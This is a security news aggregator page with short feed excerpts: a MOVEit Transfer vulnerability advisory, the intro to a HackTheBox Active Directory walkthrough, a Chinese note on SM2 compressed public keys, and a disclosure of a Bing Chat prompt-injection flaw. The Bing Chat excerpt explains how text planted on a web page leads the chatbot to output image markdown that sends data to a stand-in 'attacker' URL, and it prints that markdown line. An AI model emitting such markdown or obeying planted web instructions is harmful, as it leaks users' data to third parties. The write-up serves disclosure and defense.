Aggregator

MOVEit Transfer Critical Privilege Escalation Vulnerability

X-Force Exchange - Collection Feed
2 years 6 months ago
Summary Progress, the vendor that provides MOVEit, has disclosed a new, critical vulnerability in its MOVEit file transfer program. Threat Type Vulnerability Overview ***UPDATE #1 - June 19, 2023*** Progress has released an update to their original advisory. The vulnerability has been assigned CVE-2023-35708 and a patch has been made available. See the updated advisory here for additional information. Original Post A new privilege escalation and unauthorized access vulnerability in Progress’ MOVEit Tran

HackTheBox Escape [Net-NTLMv2 + ADCS + PTH + Silver Ticket]

fdvoid0's blog
2 years 6 months ago
简述

本文是medium难度的HTB Escape机器的域渗透部分,其中Net-NTLMv2, ADCS, PTH, Silver Ticket等域渗透细节是此box的特色,主要参考0xdf’s blog Escape walkthrough和HTB’s official Escape walkthrough记录这篇博客加深记忆和理解,及供后续做深入研究查阅,备忘。

253

还原 SM2 压缩公钥的几种方法

她和她的猫
2 years 6 months ago
在 SM2 算法中,公钥的大小为 64 字节,算上前缀 04 的话就是 65 字节。公钥由椭圆曲线上的坐标点(x, y)组成,即每个坐标点都是 32 字节的大数。为了节省存储空间,通常会对公钥进行压缩后使用,也就是压缩公钥。

Bing Chat: Data Exfiltration Exploit Explained

Embrace The Red
2 years 6 months ago

This post describes how I found a Prompt Injection attack angle in Bing Chat that allowed malicious text on a webpage (like a user comment or an advertisement) to exfiltrate data.

The Vulnerability - Image Markdown Injection

When Bing Chat returns text it can return markdown elements, which the client will render as HTML. This includes the feature to include images.

Imagine the LLM returns the following text:

![data exfiltration in progress](https://attacker/logo.png?q=[DATA_EXFILTRATION])

This will be rendered as an HTML image tag with a src attribute pointing to the attacker server.

Managed ad